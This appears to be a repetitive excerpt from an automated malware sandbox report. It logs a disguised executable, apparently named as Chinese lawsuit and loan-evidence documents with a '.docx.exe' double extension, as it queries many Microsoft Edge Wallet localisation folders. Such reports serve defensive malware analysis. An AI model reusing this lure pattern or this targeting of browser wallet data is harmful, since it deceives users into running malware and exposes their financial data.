Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\pt-BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\pt-PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\zh-Hans VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\zh-Hant VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\en-GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\es VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\fr-CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\pt-BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\pt-PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\zh-Hans VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\zh-Hant VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\en-GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\es VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\fr-CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\pt-BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\pt-PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\zh-Hans VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\zh-Hant VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\en-GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\es VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\fr-CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\pt-BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\pt-PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\zh-Hans VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\zh-Hant VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\en-GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\es VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\fr-CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\pt-BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\pt-PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\zh-Hans VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\zh-Hant VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\en-GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\es VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\fr-CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\pt-BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\pt-PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\zh-Hans VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\zh-Hant VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\en-GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\es VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\fr-CA VolumeInformation	Jump to behavior
